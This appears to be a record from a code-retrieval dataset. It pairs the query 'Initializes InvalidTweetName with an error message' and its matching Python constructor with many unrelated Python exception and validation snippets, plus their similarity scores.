)", "def __init__(self, msg: str, definition: Optional[ErrorDef] = None) -> None:\n if definition is None:\n definition = CommonErrorDef.INTERNAL_SERVER_ERROR\n\n super().__init__(definition=definition, error=msg)", "def testValidation(self):\n # Test optional.\n class SubMessage(messages.Message):\n pass\n\n class Message(messages.Message):\n val = messages.MessageField(SubMessage, 1)\n\n message = Message()\n\n message_field = 
messages.MessageField(Message, 1)\n message_field.validate(message)\n message.val = SubMessage()\n message_field.validate(message)\n self.assertRaises(messages.ValidationError,\n setattr, message, 'val', [SubMessage()])\n\n # Test required.\n class Message(messages.Message):\n val = messages.MessageField(SubMessage, 1, required=True)\n\n message = Message()\n\n message_field = messages.MessageField(Message, 1)\n message_field.validate(message)\n message.val = SubMessage()\n message_field.validate(message)\n self.assertRaises(messages.ValidationError,\n setattr, message, 'val', [SubMessage()])\n\n # Test repeated.\n class Message(messages.Message):\n val = messages.MessageField(SubMessage, 1, repeated=True)\n\n message = Message()\n\n message_field = messages.MessageField(Message, 1)\n message_field.validate(message)\n self.assertRaisesWithRegexpMatch(\n messages.ValidationError,\n \"Field val is repeated. Found: <SubMessage>\",\n setattr, message, 'val', SubMessage())\n # pylint: disable=redefined-variable-type\n message.val = [SubMessage()]\n message_field.validate(message)", "def __init__(self, data_file_name: str, message: str) -> None:\n\n super().__init__(\n \"Invalid data error. \"\n \"The file '{}' contained data of the wrong format: {}\".format(\n data_file_name, message\n )\n )", "def __init__(self, for_field, *args, **kwargs):\n self.for_field = for_field\n kwargs.setdefault(\"db_index\", True)\n kwargs.setdefault(\"editable\", False)\n kwargs.setdefault(\"max_length\", 255)\n\n # For use in pre_save()\n self.max_length = kwargs[\"max_length\"]\n\n super().__init__(**kwargs)", "def __init__(self, message_id: str, error_code: str):\n super().__init__(f\"Command failed: {error_code}\")\n self.message_id = message_id\n self.error_code = error_code", "def test_password_strength_validator_length_fail(self):\n with self.assertRaises(ValidationError):\n validate_password_strength('hi')", "def test_validate_min_length(self):\n\n test_strings = [\n 'oa',\n 'al',\n 'v',\n ]\n\n testrow = TestSchema()\n\n for test_string in test_strings:\n testrow.string_min_field = test_string\n self.assertRaises(Exception, testrow.save)", "def __init__(self, field, *, char, **extra):\n if len(char) != 1:\n raise ValueError('CharCount must count exactly one char.')\n super().__init__(field, char=char, **extra)", "def test_less_than_min_length_invalid_password(self):\n pass_field = Field(\"\".join(['x' * (int(self.app.config['MIN_PWD_LEN']) - 1)]))\n\n with self.assertRaises(ValidationError):\n valid_password(None, pass_field)", "def __init__(self, message):\n self.message = LicenseError.ERROR + message\n\n super(LicenseError, self).__init__(self.message)", "def __init__(self, msg):\n super(F5CcclValidationError, self).__init__(msg)\n self.msg = 'Service configuration provided does not match schema: ' + \\\n msg", "def __init__(self, error_num, args, msg):\n\n self.error_num = error_num\n self.args = args\n self.message = msg", "def test_field_len(self):\n client = self.base_scenario(\n frang_config=\"http_field_len 300;\",\n requests=[self.post_request + [(\"header\", \"x\" * 320)]],\n )\n self.check_response(\n client,\n status_code=\"403\",\n warning_msg=\"frang: HTTP (in-progress )?field length exceeded for\",\n )", "def test_splitValidatesLength(self):\n self.assertRaises(ValueError, irc.split, \"foo\", 0)\n self.assertRaises(ValueError, irc.split, \"foo\", -1)", "def add_error(self, field, message):\n add_list_value(self.errors, field, message)", "def test_value_init15(self):\n with 
self.assertRaises(ValueError) as err:\n r1 = Rectangle(0, 0)\n msg = \"width must be > 0\"\n self.assertEqual(str(err.exception), msg)", "def validate_max_length(cls, value: str, field: ModelField) -> str:\n if cls.max_length is not None and len(value) > cls.max_length:\n raise InvalidLengthValue(\n field_name=field.name, constraint=cls.max_length, operation='max'\n )\n return value", "def test_error_when_length_mismatch(self):\n self._assert_raise_error(\n probabilities=[0.5, 0.5],\n random_nums=[0],\n error=LengthMismatchError,\n code=1\n )", "def validate_min_length(cls, value: str, field: ModelField) -> str:\n if cls.min_length is not None and len(value) < cls.min_length:\n raise InvalidLengthValue(\n field_name=field.name, constraint=cls.min_length, operation='min'\n )\n return value", "def __init__(self, message: str) -> None:\n\n super().__init__(\n \"Due to the nature of the load data, an integer multiple of resolutions, \"\n \"or divsions of resolutions, must be supplied with the '--resolution' or \"\n \"'-r' flag.\\nI appreciate that this is poor coding, but at least I took \"\n \"the time to write a custom exception for it :p .\\n Error message: \"\n f\"{message}\"\n )", "def __init__(self, error_code: int, message: str):\r\n self.error_code: int = error_code\r\n self.message: str = message\r\n super(ImageUnaccesible, self).__init__(self.error_code,\r\n f'{self.error_code} ---> \\\r\n {self.message}')", "def __init__(self, minlen=0, maxlen=six.MAXSIZE, regex=\"\"):\n self.minlen = max(0, minlen)\n self.maxlen = max(self.minlen, maxlen)\n self.regex = regex\n self._init()", "def _validate_input(self):\n\n if is_empty(self.message) == True:\n raise ValidationException(\"Message cannont be empty.\")", "def testConstructorNotAField(self):\n class SomeMessage(messages.Message):\n pass\n\n self.assertRaisesWithRegexpMatch(\n AttributeError,\n ('May not assign arbitrary value does_not_exist to message '\n 'SomeMessage'),\n SomeMessage,\n does_not_exist=10)", "def testValidate_Optional(self):\n class SimpleMessage(messages.Message):\n non_required = messages.IntegerField(1)\n\n simple_message = SimpleMessage()\n simple_message.check_initialized()\n simple_message.non_required = 10\n simple_message.check_initialized()", "def error_message(self, error_field=None, **kwargs):\n\n if error_field:\n return \"Validation failed in LogicalConnector \\\"{}\\\" on field \\\"{}\\\"\".format(self.__class__.__name__, error_field)\n return \"Validation failed in LogicalConnector \\\"{}\\\"\".format(self.__class__.__name__)", "def testMessageField(self):\n self.assertRaises(messages.FieldDefinitionError,\n messages.MessageField,\n str,\n 10)\n\n self.assertRaises(messages.FieldDefinitionError,\n messages.MessageField,\n messages.Message,\n 10)\n\n class MyMessage(messages.Message):\n pass\n\n field = messages.MessageField(MyMessage, 10)\n self.assertEquals(MyMessage, field.type)", "def test_raises_on_constructor_fields_error(self):\n self.form.constructor_fields = None\n message = \"Expected a list of field name strings for constructor_fields. 
\"\n with self.assertRaisesMessage(ImproperlyConfigured, message):\n self.form.confirm_required_fields()", "def error_message(self, error_message: str):\n\n self._error_message = error_message", "def test_value_init7(self):\n with self.assertRaises(ValueError) as err:\n r1 = Rectangle(-4, 5)\n msg = \"width must be > 0\"\n self.assertEqual(str(err.exception), msg)", "def __init__(self):\n\n # dictionary that link all the invalid equation code to the\n # corresponding error massage\n self.ERROR_MASSAGE_DIC = {\n InvalidEquationCode.VALID: \"Valid\",\n InvalidEquationCode.UNDEFINED_CHARACTERS:\n \"Undefined characters in your equation\",\n InvalidEquationCode.CLOSE_WITHOUT_OPEN_BRACKET:\n \"Close bracket without open one\",\n InvalidEquationCode.EMPTY_EQUATION:\n \"Empty equation\",\n InvalidEquationCode.TOO_MANY_OPEN_BRACKET:\n \"Too many open brackets...(missing close brackets)\",\n InvalidEquationCode.OPERATORS_OPERANDS_ERROR:\n \"Missing operators/operands..\",\n InvalidEquationCode.TOO_MANY_DOTS:\n \"Too many dots in one number\",\n InvalidEquationCode.UNNECESSARY_BRACKET:\n \"Unnecessary brackets in your equation\",\n InvalidEquationCode.DIVISION_BY_ZERO:\n \"Division by zero is undefined\",\n InvalidEquationCode.FACTORIAL_ON_NEGATIVE_NUMBER:\n \"Factorial on negative number is illegal\",\n InvalidEquationCode.FACTORIAL_ON_DECIMAL_NUMBER:\n \"Factorial on negative number is illegal\",\n InvalidEquationCode.NUMBER_TOO_BIG: \"Number is too big\",\n InvalidEquationCode.COMPLEX_NUMBER: \"Complex number\",\n InvalidEquationCode.EMPTY_DECIMAL_POINT:\n \"Empty decimal point....(missing number)\",\n }", "def test_validate_password_length_without_default_value(self):\n for _ in range(3):\n with self.assertRaises(ValidationError):\n test_password = os.urandom(random.randint(0, self.min_password_length - 1)).decode('latin1')\n validate_password_length(test_password)\n try:\n for _ in range(3):\n test_password = os.urandom(random.randint(self.min_password_length, 30)).decode('latin1')\n validate_password_length(test_password)\n except ValidationError:\n self.fail('ValidationError must not have been raised')", "def validate_fields(cls, message_type: str, attachment_data: dict) -> None:", "def validate_password_length(value):\r\n message = _(\"Invalid Length ({0})\")\r\n code = \"length\"\r\n\r\n min_length = getattr(settings, 'PASSWORD_MIN_LENGTH', None)\r\n max_length = getattr(settings, 'PASSWORD_MAX_LENGTH', None)\r\n\r\n if min_length and len(value) < min_length:\r\n raise ValidationError(message.format(_(\"must be {0} characters or more\").format(min_length)), code=code)\r\n elif max_length and len(value) > max_length:\r\n raise ValidationError(message.format(_(\"must be {0} characters or less\").format(max_length)), code=code)", "def on_init_fail(self, event_time, message):\n pass", "def length_changed(self, value):\n self.message.dlc = value\n self.validate_data_input(value)", "def validate(self):\n\tif self.is_new():\n\t\treturn\n\n\tself.get_columns_from_db()\n\n\tcolumns = [frappe._dict({\"fieldname\": f, \"fieldtype\": \"Data\"}) for f in standard_varchar_columns]\n\tcolumns += self.columns.values()\n\n\tfor col in columns:\n\t\tif len(col.fieldname) >= 64:\n\t\t\tfrappe.throw(f\"Fieldname is limited to 64 characters ({frappe.bold(col.fieldname)})\")\n\n\t\tif col.fieldtype in type_map and type_map[col.fieldtype][0]==\"varchar\":\n\n\t\t\t# validate length range\n\t\t\tnew_length = cint(col.length) or cint(varchar_len)\n\t\t\tif not (1 <= new_length <= 
1000):\n\t\t\t\tfrappe.throw(f\"Length of {col.fieldname} should be between 1 and 1000\")\n\n\t\t\tif not frappe.local.conf.reduce_varchar_on_migration:\n\t\t\t\tcontinue\n\n\t\t\tcurrent_col = self.current_columns.get(col.fieldname, {})\n\t\t\tif not current_col:\n\t\t\t\tcontinue\n\t\t\tcurrent_type = self.current_columns[col.fieldname][\"type\"]\n\t\t\tcurrent_length = re.findall('varchar\\(([\\d]+)\\)', current_type)\n\t\t\tif not current_length:\n\t\t\t\t# case when the field is no longer a varchar\n\t\t\t\tcontinue\n\t\t\tcurrent_length = current_length[0]\n\t\t\tif cint(current_length) > cint(new_length):\n\t\t\t\ttry:\n\t\t\t\t\t# check for truncation\n\t\t\t\t\tmax_length = frappe.db.sql(\"\"\"select max(char_length(`{fieldname}`)) from `tab{doctype}`\"\"\"\\\n\t\t\t\t\t\t.format(fieldname=col.fieldname, doctype=self.doctype))\n\n\t\t\t\texcept (InternalError, OperationalError) as e:\n\t\t\t\t\tif e.args[0] == ER.BAD_FIELD_ERROR:\n\t\t\t\t\t\t# Unknown column 'column_name' in 'field list'\n\t\t\t\t\t\tcontinue\n\n\t\t\t\t\telse:\n\t\t\t\t\t\traise\n\n\t\t\t\tif max_length and max_length[0][0] and max_length[0][0] > new_length:\n\t\t\t\t\tif col.fieldname in self.columns:\n\t\t\t\t\t\tself.columns[col.fieldname].length = current_length\n\n\t\t\t\t\tfrappe.msgprint(f\"\"\"\n\t\t\t\t\t\tReverting length to {current_length}\n\t\t\t\t\t\tfor '{col.fieldname}' in '{self.doctype}';\n\t\t\t\t\t\tSetting the length as {new_length} will cause truncation of data.\n\t\t\t\t\t\"\"\")", "def __init__(self, _client=None, minimum_length=None):\n\n super().__init__(_client=_client)\n\n # inline imports for avoiding circular references and bulk imports\n\n # fields\n self._minimum_length = fields.IntegerField(value=minimum_length)", "def error(self, message):\r\n self._construct_partial_parser().error(message)", "def test_length(self):\n form_data = self.form_data('c897B$eH@')\n form = self.form(data=form_data, user=self.u)\n self.assertFalse(form.is_valid())", "def validate_frame_length(frame_length, algorithm):\n if frame_length < 0 or frame_length % algorithm.encryption_algorithm.block_size != 0:\n raise SerializationError(\n \"Frame size must be a non-negative multiple of the block size of the crypto algorithm: {block_size}\".format(\n block_size=algorithm.encryption_algorithm.block_size\n )\n )\n if frame_length > aws_encryption_sdk.internal.defaults.MAX_FRAME_SIZE:\n raise SerializationError(\n \"Frame size too large: {frame} > {max}\".format(\n frame=frame_length, max=aws_encryption_sdk.internal.defaults.MAX_FRAME_SIZE\n )\n )", "def error_message(self, error_message):\n\n self._error_message = error_message", "def test_check_map_var_len_not_specified(self):\r\n\r\n self.assertRaises(ValueError, check_map,\r\n self.valid_mapping_data_var_len_bcs)", "def test_init_valid_field(self):\n fields = {'Conn Note': {'offset': 0,\n 'length': 20}}\n parser = top.Parser(fields=fields)\n received = parser.get_fields()\n expected = fields\n msg = 'Fields initialisation property setter/getter error.'\n self.assertEqual(received, expected, msg)", "def add_error(self, request, message):\n\n ParameterErrorMessage(request, self, message)", "def __init__(self, message=None):\n if message is not None:\n super(CryptoritoError, self).__init__(message)\n else:\n super(CryptoritoError, self).__init__()", "def error_message(self, error_message):\n # type: (string_types) -> None\n\n if error_message is not None:\n if not isinstance(error_message, string_types):\n raise TypeError(\"Invalid type for `error_message`, 
type has to be `string_types`\")\n\n self._error_message = error_message", "def __init__(self,value,message):\n ValueError.__init__(self,value,message)", "def mobile_len_validator(mobile):\n if len(mobile) != 13:\n raise ValidationError('Invalid mobile len')", "def test_that_field_required_validations_are_triggered_on_incorrect_attribute_setting(\n self,\n ):\n person = Person(first_name=\"Johnny\", last_name=\"John\")\n\n with pytest.raises(ValidationError) as error:\n person.first_name = \"\" # Simulate an error by force-resetting an attribute\n\n assert error.value.messages == {\"first_name\": [\"is required\"]}", "def testOffsetBadLength(self):\n def setOffset():\n self.cc.offset = ['banana']\n\n self.assertRaises(\n ValueError,\n setOffset\n )", "def __init__(self, size):\n self.handle_errors(size)\n self.__size = size", "def __init__(self, error_msg):\n super(ConnectionException, self).__init__(error_msg)", "def test_badsizevaluewithstring(self):\n Rectangle.reset_objects()\n with self.assertRaises(TypeError) as e:\n r1 = Square(\"foo\", 1, 2, 3)\n self.assertEqual(str(e.exception), 'width must be an integer')", "def test_init_with_invalid_body(self):\n body = {'foo': 2}\n with pytest.raises(ValueError) as excinfo:\n SQSMessage(self.schema, body=body)\n\n assert \"{'event_name': 'Required'}\" in str(excinfo.value)\n\n body = {'event_name': 2}\n with pytest.raises(ValueError) as excinfo:\n SQSMessage(self.schema, body=body)\n\n assert 'String does not match expected pattern' in str(excinfo.value)\n\n body = {'event_name': 'job.'}\n with pytest.raises(ValueError) as excinfo:\n SQSMessage(self.schema, body=body)\n\n assert 'String does not match expected pattern' in str(excinfo.value)", "def __init__(__self__, *,\n message: Optional[pulumi.Input[str]] = None,\n type: Optional[pulumi.Input['DataSourceErrorInfoType']] = None):\n if message is not None:\n pulumi.set(__self__, \"message\", message)\n if type is not None:\n pulumi.set(__self__, \"type\", type)", "def testMessageFieldValidate(self):\n class MyMessage(messages.Message):\n pass\n\n class AnotherMessage(messages.Message):\n pass\n\n field = messages.MessageField(MyMessage, 10)\n field.validate(MyMessage())\n\n self.assertRaises(messages.ValidationError,\n field.validate,\n AnotherMessage())", "def __init__(self, max_size=5):\n if max_size<0: \n raise ValueError \n\n self.max_size = max_size \n super().__init__()", "def __init__(self, domain, field, **options):\n\n super().__init__(domain, field, **options)\n\n if not callable(self.accepted_minimum_provider) and \\\n not callable(self.accepted_maximum_provider) and \\\n self.accepted_minimum is not None and self.accepted_maximum is not None \\\n and self.accepted_minimum > self.accepted_maximum:\n raise MinimumValueLargerThanMaximumValueError('Accepted minimum value for '\n 'validator [{name}] could not be '\n 'larger than accepted maximum value.'\n .format(name=self))\n\n self._validate_exception_type(self.range_value_error)", "def set_length(self, length):\n if length < 0:\n raise AttributeError('length should be positive')\n self.progress_char_length = length", "def testOffsetBadLength(self):\n def setOffset():\n self.node.offset = ['banana']\n\n self.assertRaises(\n ValueError,\n setOffset\n )", "def set_length(self, new_length):\n if(new_length == None):\n self._logger.write(\"Error! new_length cannot be a NoneType\")\n elif(type(new_length) != float):\n self._logger.write(\"Error! 
new_length must be of type float\")\n else:\n try:\n self._length = new_length\n except Exception as e:\n self._logger.write(\"Error! Could not set the new length:\\n %s\" % e)", "def test_length_unknown_unit(self):\n with self.assertRaises(ValueError):\n METRIC_SYSTEM.length(5, 'fr')" ]
[ "0.6513797", "0.6197296", "0.61887497", "0.6181867", "0.61449176", "0.60927874", "0.60907245", "0.6026868", "0.6024588", "0.59886456", "0.59638536", "0.5922339", "0.5841489", "0.5829803", "0.5813546", "0.57707214", "0.570892", "0.570892", "0.5679656", "0.5664138", "0.5654813", "0.56524014", "0.56334627", "0.5622623", "0.5596413", "0.55902493", "0.554929", "0.5548877", "0.55393445", "0.5529387", "0.55003005", "0.54902375", "0.5476536", "0.54677033", "0.5457934", "0.54550767", "0.54450285", "0.5428507", "0.54178184", "0.5395846", "0.5388124", "0.53854465", "0.53816617", "0.53629804", "0.5351477", "0.5349587", "0.53401124", "0.53359866", "0.53036505", "0.5302663", "0.5299554", "0.52995193", "0.5291401", "0.5277605", "0.52763844", "0.5275263", "0.52752453", "0.52576876", "0.5251381", "0.52499425", "0.5241349", "0.523736", "0.5231825", "0.52298415", "0.5212143", "0.5201551", "0.52009434", "0.5199836", "0.518912", "0.51809627", "0.5178487", "0.51700985", "0.5168601", "0.516497", "0.51556504", "0.51553434", "0.51520413", "0.514857", "0.51452214", "0.51375055", "0.51340204", "0.5118383", "0.5116371", "0.51086116", "0.5107803", "0.50882244", "0.50783604", "0.5077081", "0.50736004", "0.5062855", "0.50587314", "0.5049467", "0.5041273", "0.503964", "0.5033142", "0.50244176", "0.5019676", "0.5018494", "0.50172406", "0.5014535", "0.50071126" ]
0.0
-1
Initializes InvalidTweetName with an error message.
def __init__(self, msg): self.msg = msg
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __init__(self, data_file_name: str, message: str) -> None:\n\n super().__init__(\n \"Invalid data error. \"\n \"The file '{}' contained data of the wrong format: {}\".format(\n data_file_name, message\n )\n )", "def test_fails_on_no_name(self):\n invalid_credentials_no_name_twine = \"\"\"\n {\n \"credentials\": [\n {\n \"purpose\": \"credentials without a name should be invalid\"\n }\n ]\n }\n \"\"\"\n\n with self.assertRaises(exceptions.InvalidTwine):\n Twine(source=invalid_credentials_no_name_twine)", "def __init__(self, username: str) -> None:\n try:\n check_string(username, 'username', 'a-z0-9', 100)\n except IllegalParameterError as e:\n raise IllegalUsernameError(e.message) from e\n self.name = username", "def name_error(name):\n\n if len(name) > MAX_NAME_LENGHT:\n raise InputError(description=\"Name cannot be more than 20 characters long\")", "def __init__(self, message, code, *args):\n self.message = message\n self.code = code\n super(TwitterException, self).__init__(message, code, *args)", "def __init__(self, error_msg):\n super(SdkException, self).__init__()\n self.error_msg = error_msg", "def get_name_validation_error(name):\n return '' if name else accounts.REQUIRED_FIELD_NAME_MSG", "def error_message(self, error_message: str):\n\n self._error_message = error_message", "def __init__(self,data_name):\n\t\tif data_name.lower().strip() not in DATASETS.keys():\n\t\t\tprint(f\"{data_name} isn't a valid data name! One of \"+\", \".join(DATASETS.keys()))\n\t\t\traise Exception\n\n\t\tself.data_name = data_name.lower().strip()", "def __init__(self, message=None):\n if message is None:\n message = \"Game error!\"\n self.__message = message", "def __init__(self, name):\n super(NodeExistsError, self).__init__(name)\n self.name = name", "def username_error(self, msg):\n raise NotImplementedError('username_error')", "def __init__(self, base):\n if isinstance(base, str):\n self._name = base\n else:\n raise TypeError(NAME_CREATE_ERROR)", "def _load_from_text(self, text):\n self.code = \"Error\"\n self.message = text", "def __init__(self, message=\"\"):\n super(ValidationError, self).__init__(message)", "def __init__(self, message=\"\"):\n super(ApplicationError, self).__init__(message)", "def error_message(self, error_message):\n\n self._error_message = error_message", "def __init__(self, message: str) -> None:\n\n super().__init__(\n \"Data requested from a class could not be found: {}\".format(message)\n )", "def __init__(self, message=\"\"):\n super(DataError, self).__init__(message)", "def name(self, the_name):\n if (len(the_name) < TempDataset.MIN_LEN\n or len(the_name) > TempDataset.MAX_LEN):\n raise ValueError\n self._name = the_name", "def __init__(self, message_id: str, error_code: str):\n super().__init__(f\"Command failed: {error_code}\")\n self.message_id = message_id\n self.error_code = error_code", "def on_init_fail(self, event_time, message):\n pass", "def testUnknownName(self):\n exc = self.assertRaises(\n ValueError,\n self.client.status,\n \"ignored\", \"IMPOSSIBLE?!\",\n )\n self.assertEqual(str(exc),\n \"Unknown names: \" + repr(set([\"IMPOSSIBLE?!\"])))", "def tweet_invalid(self):\r\n\r\n valid = True # optimism\r\n validation_error = None\r\n\r\n if not self.tweet_length():\r\n valid, validation_error = False, 'Empty text'\r\n\r\n if self.tweet_length() > MAX_LENGTH:\r\n valid, validation_error = False, 'Too long'\r\n\r\n if re.search(ur''.join(REGEXEN['invalid_control_characters']), self.text):\r\n valid, validation_error = False, 'Invalid characters'\r\n \r\n if 
self.parent and hasattr(self.parent, 'tweet_is_valid'):\r\n self.parent.tweet_is_valid = valid\r\n if self.parent and hasattr(self.parent, 'tweet_validation_error'):\r\n self.parent.tweet_validation_error = validation_error\r\n\r\n return validation_error if not valid else False", "def __init__(self):\n self.message = \"No task found with the given string.\"", "def __init__(self, exception, message=\"Invalid requests parse!\"):\n self.message = message\n self.exception = exception\n super().__init__(self.message)", "def __init__(self, error_type: str):\n self.message = ''\n\n if error_type == 'length':\n self.message = 'Password must be between 6 and 100 characters long'\n\n elif error_type == 'one_lower':\n self.message = 'Password must contain at least one lowercase letter'\n\n elif error_type == 'one_upper':\n self.message = 'Password must contain at least one uppercase letter'\n\n elif error_type == 'one_digit':\n self.message = 'Password must contain at least one number'\n\n logging.error(str(self))\n super().__init__(self.message)", "def test_bad_name(self):\n\n request = service.get_request('GET', {u'taxon': u'Nosuchtaxonia'})\n x = self.start_request_tests(request)\n m = x.json().get(u'message')\n self.assertTrue(x.status_code >= 200)\n self.assertTrue('No Taxon matched\" in \"%s\"' % m)", "def test_fails_on_lowercase_name(self):\n invalid_credentials_lowercase_name_twine = \"\"\"\n {\n \"credentials\": [\n {\n \"name\": \"my_secrets_should_be_uppercase\",\n \"purpose\": \"Token for accessing a 3rd party API service\"\n }\n ]\n }\n \"\"\"\n\n with self.assertRaises(exceptions.InvalidTwine):\n Twine(source=invalid_credentials_lowercase_name_twine)", "def error_message(self, error_message):\n # type: (string_types) -> None\n\n if error_message is not None:\n if not isinstance(error_message, string_types):\n raise TypeError(\"Invalid type for `error_message`, type has to be `string_types`\")\n\n self._error_message = error_message", "def test_name_missing(self) -> None:\n with pytest.raises(NotFound):\n ObservationType.from_name('Missing ObservationType Name')", "def test_fails_on_name_whitespace(self):\n invalid_credentials_space_in_name_twine = \"\"\"\n {\n \"credentials\": [\n {\n \"name\": \"MY NAME SHOULD NOT HAVE WHITESPACE\",\n \"purpose\": \"Token for accessing a 3rd party API service\"\n }\n ]\n }\n \"\"\"\n\n with self.assertRaises(exceptions.InvalidTwine):\n Twine(source=invalid_credentials_space_in_name_twine)", "def username_error(self, msg):\n print('\\nusername error: %s' % msg, file=self.console)\n self.username = input('Username: ')", "def __init__(self, message=None):\n if message is not None:\n super(CryptoritoError, self).__init__(message)\n else:\n super(CryptoritoError, self).__init__()", "def __init__(self, msg):\n super(F5CcclSchemaError, self).__init__(msg)\n self.msg = 'Schema provided is invalid: ' + msg", "def __init__(self, message):\n self.message = LicenseError.ERROR + message\n\n super(LicenseError, self).__init__(self.message)", "def set_error(self, name, value):\n self.errors[name] = value", "def name(self, name) :\n\t\ttry :\n\t\t\tself._name = name\n\t\texcept Exception as e:\n\t\t\traise e", "def __init__(self, name: str) -> None:\n self._name = name", "def error(self, message, token=None):\n raise ParseException(\n message,\n self.filename,\n line=self._line,\n line_number=self._line_number,\n token=token)", "def __init__(self, msg):\n\n super(HTTPError, self).__init__(msg)\n self.msg = msg", "def __init__(self, name, f):\r\n self.FailedIds = 
[]\r\n self.Name = name\r\n self.F = f", "def __init__(self):\n self.message = \"Invalid time zone string, choose one from https://stackoverflow.com/questions/13866926/is-there-a-list-of-pytz-timezones.\"", "def test_place_name_exception(self):\n with pytest.raises(Exception):\n assert self.test_exception() != \"Mogn\"", "def validate_username(self, username):\n user = User.query.filter_by(username=username.data).first()\n if user:\n # if user is not None\n raise ValidationError('That username is taken. Please choose a different one.')", "def __init__(self, msg: str, definition: Optional[ErrorDef] = None) -> None:\n if definition is None:\n definition = CommonErrorDef.INTERNAL_SERVER_ERROR\n\n super().__init__(definition=definition, error=msg)", "def test_init_with_invalid_body(self):\n body = {'foo': 2}\n with pytest.raises(ValueError) as excinfo:\n SQSMessage(self.schema, body=body)\n\n assert \"{'event_name': 'Required'}\" in str(excinfo.value)\n\n body = {'event_name': 2}\n with pytest.raises(ValueError) as excinfo:\n SQSMessage(self.schema, body=body)\n\n assert 'String does not match expected pattern' in str(excinfo.value)\n\n body = {'event_name': 'job.'}\n with pytest.raises(ValueError) as excinfo:\n SQSMessage(self.schema, body=body)\n\n assert 'String does not match expected pattern' in str(excinfo.value)", "def raiseNameError(text):\n pattern = re.compile(\"[a-zA-Z]\")\n if not pattern.match(text):\n raise Exception(\"Invalid Name Entered\")", "def _check_name(self):\n\t\tpass", "def __init__(\n self,\n _email_address=None,\n _name=None,\n _otherinfo=\"\",\n _extrainfo=\"\",\n **kwargs\n ):\n self.email_address = _email_address\n self.name = _name\n self.otherinfo = _otherinfo\n self.extrainfo = _extrainfo\n self.misc = kwargs.items()\n\n self.validate()", "def __init__(self, msg='Can\\'t find ticker of this brand name.'):\n super().__init__(msg)", "def error_name(self) -> str:\n return self._error_name", "def __init__(self, message, text=None, reference=None, contact=None):\n self.openid_message = message\n self.reference = reference\n self.contact = contact\n assert type(message) not in [str, str]\n Exception.__init__(self, text)", "def __init__(self, from_email):\n self.code = 400\n self.from_email = from_email\n Error.__init__(self)", "def __init__(self, name):\n self._name = name\n pass", "def __init__(self, msg=\"\"\"Google can\\'t find enough news data for this query: Invalid query\"\"\"):\n super().__init__(msg)", "def __init__(self):\n self.message = \"No stop found with the given string.\"", "def __init__(self, first_name, second_name, age, location):\n self.name = f'{first_name.title()} {second_name.title()}'\n self.age = age\n self.location = location\n self.login_attempts = 0", "def __init__(self, obj):\n super().__init__(\"File {} doesn't exist or invalid.\".format(obj))", "def __init__(self, name: Optional[str] = None):\n self.name = name", "def __init__(self, msg):\n\n super(DBValueError, self).__init__(msg)\n self.msg = msg", "def _init_company_name(cls, company_name: str = None) -> str:\n if company_name and isinstance(company_name, str):\n return company_name\n if company_name:\n return TypeError(\"company_name kwarg should be an instance of str\")\n return FAKE.format('company')", "def validate_username(self, username):\n user = User.query.filter_by(username=username.data).first()\n if user:\n raise ValidationError('That username already exists. 
Please choose another username.')", "def __init__(self, error_msg):\n super(RequestTimeoutException, self).__init__(error_msg)", "def __init__(self, name):\n self._name = name", "def __init__(self, name):\n self._name = name", "def _init(self, **kwds):\n name = kwds.get('name')\n if name and not self.data.has_key('name'):\n self.set_name(name)\n self.characterID = kwds.get('characterID', None)\n self.myName = kwds.get('myName', u'')", "def test_username_not_unique(bot):\n expect_error(register, InputError, bot.username, \"abcdef\", \"a\", \"a\", \"a\")", "def __init__(self, error_msg):\n super(ConnectionException, self).__init__(error_msg)", "def __init__(self, msg):\n\n super(ConfigError, self).__init__(msg)\n self.msg = msg", "def nameIsValid(self, name):\n self.notify.debug('nameIsValid')\n if (name in self.usedNames):\n return OTPLocalizer.ToonAlreadyExists % (name)\n\n problem = NameCheck.checkName(name, font=self.nameEntry.getFont())\n if problem:\n return problem\n\n # name has passed local checks\n return None", "def __init__(self, error_num, args, msg):\n\n self.error_num = error_num\n self.args = args\n self.message = msg", "def test_constructor_with_wrong_folder_name_should_raise_exception(self):\n with self.assertRaises(UploaderException) as cm:\n GDriveUploader(None, 'my_wrong_folder_name!')\n\n self.assertEqual(\n UploaderException.INVALID_DIR_NAME,\n cm.exception.code\n )", "def test_unknown_names_raise_exception(self):\r\n tm = TestModel.create(count=8, text='123456789')\r\n with self.assertRaises(TypeError):\r\n tm.update(jon='beard')", "def set_name(self,name):\n if not isinstance(name,(str)):\n raise TypeError('name must be string')\n else:\n self._name = name", "def __init__(self, message, repl):\n super(LinterFailure, self).__init__()\n self.message = message\n self.replacement = repl", "def __init__(self, error_code: int, message: str):\r\n self.error_code: int = error_code\r\n self.message: str = message\r\n super(ImageUnaccesible, self).__init__(self.error_code,\r\n f'{self.error_code} ---> \\\r\n {self.message}')", "def get_username_validation_error(username):\n return _validate(_validate_username, errors.AccountUsernameInvalid, username)", "def __init__(self, error_message: str=None, error_code: int=None): # noqa: E501\n self.swagger_types = {\n 'error_message': str,\n 'error_code': int\n }\n\n self.attribute_map = {\n 'error_message': 'error_message',\n 'error_code': 'error_code'\n }\n\n self._error_message = error_message\n self._error_code = error_code", "def __init__(self, name, pattern_factory):\n\t\tsuper(AlreadyRegisteredError, self).__init__(name, pattern_factory)", "def test_create_task_given_name_already_exists_error(self):\n rv = TEST_CLIENT.post(TASK_ROUTE, json={\"name\": util.MOCK_TASK_NAME_1})\n result = rv.json()\n\n expected = {\n \"message\": \"a task with that name already exists\",\n \"code\": \"TaskNameExists\",\n }\n self.assertDictEqual(expected, result)\n self.assertEqual(rv.status_code, 400)", "def __init__(self, error_search=\"error\"):\n self.error_search = error_search", "def __init__(self, message):\n logging.error(\"ERROR: {0}\".format(message))\n logging.error(\"Try running with --help for more information.\")", "def __init__(self, name = None):\n self._name = name", "def test_MissedName(self):\n\t\n\t\tdashboardPage = DashboardPage(self.driver)\n\t\tdashboardPage.goToOnboard()\n\t\tdashboardPage.createCustomer(\"\", S3FOLDER)\n\n\t\terr1, err2 = dashboardPage.getErrorsNoName()\n\t\tself.assertEqual(err1.text, 
